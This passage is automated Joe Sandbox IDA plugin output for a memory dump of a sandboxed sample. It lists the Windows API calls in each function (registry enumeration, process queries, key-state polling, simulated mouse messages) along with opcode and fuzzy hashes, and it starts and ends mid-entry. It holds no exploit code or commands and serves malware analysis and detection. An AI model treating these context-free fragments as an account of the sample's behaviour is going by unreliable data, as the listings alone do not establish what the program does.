                                            • __swprintf.LIBCMT ref: 00E6A5DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                            • String ID: %s%d
                                            • API String ID: 1941087503-1110647743
                                            • Opcode ID: b074c41b1b19e020d2a820b8f2fd39a7710c62db9f7d8adce2d30b6e2b920213
                                            • Instruction ID: 6de18557c966b6f16ae9b0038d20341d670254ef8909d052a172b2adb3258f27
                                            • Opcode Fuzzy Hash: b074c41b1b19e020d2a820b8f2fd39a7710c62db9f7d8adce2d30b6e2b920213
                                            • Instruction Fuzzy Hash: F811A271A80308ABDF107FA4EC85FEE77B8AF49744F085076F908BA192CA7099458F75
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E72048
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                            • API String ID: 3964851224-769500911
                                            • Opcode ID: 2099247cc46acdcecc247e3ce8764f5d70746271efc933cfcf398bb14a781b8d
                                            • Instruction ID: e7e1dcf03b61b6283f898638f363c83ba29d141aa7e00641358c75b0754ff5b8
                                            • Opcode Fuzzy Hash: 2099247cc46acdcecc247e3ce8764f5d70746271efc933cfcf398bb14a781b8d
                                            • Instruction Fuzzy Hash: 751139749001198FCF00EFA4D9519EEB7F4BF55308F54A46DD899B7252EB32690ACB50
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E8EF1B
                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E8EF4B
                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E8F07E
                                            • CloseHandle.KERNEL32(?), ref: 00E8F0FF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                            • String ID:
                                            • API String ID: 2364364464-0
                                            • Opcode ID: 6ce401577382ae1b5a613bf4220d59c90563bcfcf22dd95207b618f4f8faa61e
                                            • Instruction ID: 8a7e00ad59fd89e966db364ab48706f5369ebd608fe3c8ad54b3a77c4ff71568
                                            • Opcode Fuzzy Hash: 6ce401577382ae1b5a613bf4220d59c90563bcfcf22dd95207b618f4f8faa61e
                                            • Instruction Fuzzy Hash: 648152716043019FD720EF28CC96F6AB7E5AF88710F14981DF59AEB392DB70AC448B91
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90388
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E903C7
                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E9040E
                                            • RegCloseKey.ADVAPI32(?,?), ref: 00E9043A
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90447
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                            • String ID:
                                            • API String ID: 3440857362-0
                                            • Opcode ID: 887352747418274b2f7915f09bfec1de76377043497450d6eeaa125d44418f8d
                                            • Instruction ID: 6af8cb1c53250d923710b039bca07a6eafc9fe5508252d446741a1fad939ea9f
                                            • Opcode Fuzzy Hash: 887352747418274b2f7915f09bfec1de76377043497450d6eeaa125d44418f8d
                                            • Instruction Fuzzy Hash: BE515E31208205AFDB04EF54D881EAEB7E9FF84704F44992EF595A7292DB30ED44CB52
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E8DC3B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E8DCBE
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E8DCDA
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E8DD1B
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E8DD35
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                            • String ID:
                                            • API String ID: 327935632-0
                                            • Opcode ID: 6cbce38ee0ad87943bc6fe05aa0e4be8e7abc21d85a53bf31a60c73c84fac46f
                                            • Instruction ID: 253f664728ab6521e5b878d43056902ef636d9ab160f8a49239d9c50daf8c2f5
                                            • Opcode Fuzzy Hash: 6cbce38ee0ad87943bc6fe05aa0e4be8e7abc21d85a53bf31a60c73c84fac46f
                                            • Instruction Fuzzy Hash: BC511835A04205DFCB00EF68C8949DDF7F5EF48314B05916AE819BB3A2DB30AD85CB91
                                            APIs
                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E7E88A
                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E7E8B3
                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E7E8F2
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E7E917
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E7E91F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                            • String ID:
                                            • API String ID: 1389676194-0
                                            • Opcode ID: c0a172461f9a511e89e14e3e002dc19e7addc7bcc9e9092d21a2b843ff6d7a61
                                            • Instruction ID: 3450a2e21067ebc57f0104e64011481fa1ec9b60ab8f946c6f1e56a8829d102c
                                            • Opcode Fuzzy Hash: c0a172461f9a511e89e14e3e002dc19e7addc7bcc9e9092d21a2b843ff6d7a61
                                            • Instruction Fuzzy Hash: 8B511A35A00205DFCB05EF64C991AAEBBF5EF4C314B149099E84ABB362CB31ED51DB51
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82c959d7165ef479e61f56205c003fb248b8fb442fef85cecd2d2e4ef420615e
                                            • Instruction ID: 436a28024b87b693541e0780abdc84ad49a6da1dea2b9e3ec60f135c955dff04
                                            • Opcode Fuzzy Hash: 82c959d7165ef479e61f56205c003fb248b8fb442fef85cecd2d2e4ef420615e
                                            • Instruction Fuzzy Hash: B541DE35900204AFDB20DF28CC48BEDBBA9EF09310F196176E866B72E1D770AD41DAD1
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 00E12357
                                            • ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                            • GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                            • GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AsyncState$ClientCursorScreen
                                            • String ID:
                                            • API String ID: 4210589936-0
                                            • Opcode ID: 2a110da4890b4397c861579a055cff814fd2097de0c93763034bdc15b83b84d1
                                            • Instruction ID: 173d247d3da6b02563978bcc29f01efaa0720e865f2f9b64694d5308d950ad88
                                            • Opcode Fuzzy Hash: 2a110da4890b4397c861579a055cff814fd2097de0c93763034bdc15b83b84d1
                                            • Instruction Fuzzy Hash: 22419F3150421AFFCF158F64DC44AE9BBB4BB45364F20531AF925B22A0C77059A4DBA1
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E6695D
                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00E669A9
                                            • TranslateMessage.USER32(?), ref: 00E669D2
                                            • DispatchMessageW.USER32(?), ref: 00E669DC
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E669EB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                            • String ID:
                                            • API String ID: 2108273632-0
                                            • Opcode ID: 17b912dad98329405bf83132b212e3d73f6902515a1a7f7324b40231585a4224
                                            • Instruction ID: 6325b5766dae2fbc2a79c72052ca484ff93a0cf99675d1116e9006dc12da2149
                                            • Opcode Fuzzy Hash: 17b912dad98329405bf83132b212e3d73f6902515a1a7f7324b40231585a4224
                                            • Instruction Fuzzy Hash: 1831C231991246AFDB20CFB5FC44BF67BB8EB41388F145167E821F61A1D7349889DBA0
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 00E68F12
                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00E68FBC
                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E68FC4
                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00E68FD2
                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E68FDA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePostSleep$RectWindow
                                            • String ID:
                                            • API String ID: 3382505437-0
                                            • Opcode ID: f42e79d5ac1e712397e5f1b88f004e62674e86615cefc99a7b944c21b12ed41e
                                            • Instruction ID: 76672613ce90400437d91eeeeb07fa0733886b2a4cc388cff6e068c486729613
                                            • Opcode Fuzzy Hash: f42e79d5ac1e712397e5f1b88f004e62674e86615cefc99a7b944c21b12ed41e
                                            • Instruction Fuzzy Hash: CD31C07160021DEFDF14CF68EA4CA9E7BB6EB04315F10422AF925F61D1C7B09954DB91
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00E6B6C7
                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E6B6E4
                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E6B71C
                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E6B742
                                            • _wcsstr.LIBCMT ref: 00E6B74C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                            • String ID:
                                            • API String ID: 3902887630-0
                                            • Opcode ID: eca45de19a787c56d6665a544193cb29f386160a5a8fb5357b4d4cb50e6a0cf4
                                            • Instruction ID: 186ad79bd18a9ff852f56b945c5704bd476dcb7f82f2041031870ce47856bf53
                                            • Opcode Fuzzy Hash: eca45de19a787c56d6665a544193cb29f386160a5a8fb5357b4d4cb50e6a0cf4
                                            • Instruction Fuzzy Hash: 7121D731644204BAEB255B39EC49E7B7FACDF45790F00517BF905EA1A1EB61DC80D6A0
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9B44C
                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E9B471
                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E9B489
                                            • GetSystemMetrics.USER32(00000004), ref: 00E9B4B2
                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E81184,00000000), ref: 00E9B4D0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Long$MetricsSystem
                                            • String ID:
                                            • API String ID: 2294984445-0
                                            • Opcode ID: d9f84aeda8908ccf681ea19cca6b45bdd8330f6c3c2ad983a72a645e2cf0e781
                                            • Instruction ID: bd6e0b06f04dee80cbdb8e97e928281540f7dec1e238c049ca921e2693850c7e
                                            • Opcode Fuzzy Hash: d9f84aeda8908ccf681ea19cca6b45bdd8330f6c3c2ad983a72a645e2cf0e781
                                            • Instruction Fuzzy Hash: 71219171610255AFCF248F39ED04AAA37A4EB05725F11573AF936E61E1F7309810EB80
                                            APIs
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E69802
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E69834
                                            • __itow.LIBCMT ref: 00E6984C
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E69874
                                            • __itow.LIBCMT ref: 00E69885
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow$_memmove
                                            • String ID:
                                            • API String ID: 2983881199-0
                                            • Opcode ID: d93e3e4b3fbd61d16d72b812a382e1d1e2278f0e1f36e25c2ec1d9d5961ec4f5
                                            • Instruction ID: 19d3fdacd643df1f9051af5a6bdaa87be89a4c3885af5a422591c8c6b2256439
                                            • Opcode Fuzzy Hash: d93e3e4b3fbd61d16d72b812a382e1d1e2278f0e1f36e25c2ec1d9d5961ec4f5
                                            • Instruction Fuzzy Hash: 2921C831740308ABDB149A75AC8AEEE7BFCDF4A754F042029F904FB252D6708D4597D1
                                            APIs
                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                            • SelectObject.GDI32(?,00000000), ref: 00E1135C
                                            • BeginPath.GDI32(?), ref: 00E11373
                                            • SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ObjectSelect$BeginCreatePath
                                            • String ID:
                                            • API String ID: 3225163088-0
                                            • Opcode ID: 9aed0e25cc14c6fea8afc11679ae416d787aafde0f4923460dad7bb584b9be17
                                            • Instruction ID: d2300e69d3fc0a6000d47995c4a1122cf2df054f56c5add0cacba83381b75688
                                            • Opcode Fuzzy Hash: 9aed0e25cc14c6fea8afc11679ae416d787aafde0f4923460dad7bb584b9be17
                                            • Instruction Fuzzy Hash: 08216A74801308EFDB149F66FC057A97BB8FB00326F148267F920B61A4D37198D9EB90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: 91cc90edfbcac704835001a9fc33261397cab46b6e96bb166287bf13a23bf53e
                                            • Instruction ID: 4aed135e999b3e753b3edf7d5ede03d4b700f489fa4f32c2da4fafcaab931b35
                                            • Opcode Fuzzy Hash: 91cc90edfbcac704835001a9fc33261397cab46b6e96bb166287bf13a23bf53e
                                            • Instruction Fuzzy Hash: 8D01F9716862053BD204A6246C46FBB77AC9B173E8F246059FE45BB243E650EE11C2E0
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00E74D5C
                                            • __beginthreadex.LIBCMT ref: 00E74D7A
                                            • MessageBoxW.USER32(?,?,?,?), ref: 00E74D8F
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E74DA5
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E74DAC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                            • String ID:
                                            • API String ID: 3824534824-0
                                            • Opcode ID: cfa4dad47d0f35fafa61a87d4e0ff3fc79118a16c3ce4b1d0e9b17ec9b5b8c31
                                            • Instruction ID: c627fc443441b6cc87d982bc3ab3a4e22ae52becabebf6c4eece1e40e0f76e81
                                            • Opcode Fuzzy Hash: cfa4dad47d0f35fafa61a87d4e0ff3fc79118a16c3ce4b1d0e9b17ec9b5b8c31
                                            • Instruction Fuzzy Hash: 521108B2905244BFC7119BADEC08ADA7FACEB45324F148267F918F32A1D7758D4887A0
                                            APIs
                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                            • GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                            • HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 842720411-0
                                            • Opcode ID: 7f02c60288fe0eecb7563531b8ab3beab03b03e63855a5f7a1bdd1d6c3cc25cb
                                            • Instruction ID: eebd1bb7e6aef75d538ee48b09e704e2b5ff6351ba61d600c1297fecaaf61601
